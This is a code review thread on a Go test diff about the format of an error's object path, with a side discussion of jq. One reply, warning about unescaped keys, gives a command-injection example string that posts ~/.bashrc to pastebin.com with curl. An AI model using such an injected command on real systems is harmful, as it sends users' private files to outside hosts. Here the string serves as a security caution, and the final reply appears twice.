pkg/kubernetes/reconcile_test.go

```diff
@@ -24,7 +24,7 @@ func TestExtract(t *testing.T) {
 		{
 			name: "primitive",
 			data: testDataPrimitive(),
-			err:  ErrorPrimitiveReached{path: ".nginx.service", key: "note", primitive: "invalid because apiVersion and kind are missing"},
+			err:  ErrorPrimitiveReached{path: "nginx/service/note", primitive: "invalid because apiVersion and kind are missing"},
```

Comment:
The `path` had a format that was inspired by `jq`. Please leave it that way, we already rely on it :D

Reply:
That's surprising to me! You didn't have any code to handle escaping, so I assumed this was just for cosmetic reasons rather than you plugging it directly into jq.

We can change this back, that's fine, but I'd warn you not to plug this directly into jq. There's nothing that stops someone outputting an object with a key that might have `/` in, or `[0]`, or `"; curl -X POST pastebin.com -d ~/.bashrc`!

Reply:
It’s not connected directly, they are just meant to look similar so that users can easily use jq to find an object inside of `tk eval`. So yes cosmetic reasons

Reply:
It’s not connected directly, they are just meant to look similar so that users can easily use jq to find an object inside of `tk eval`. So yes cosmetic reasons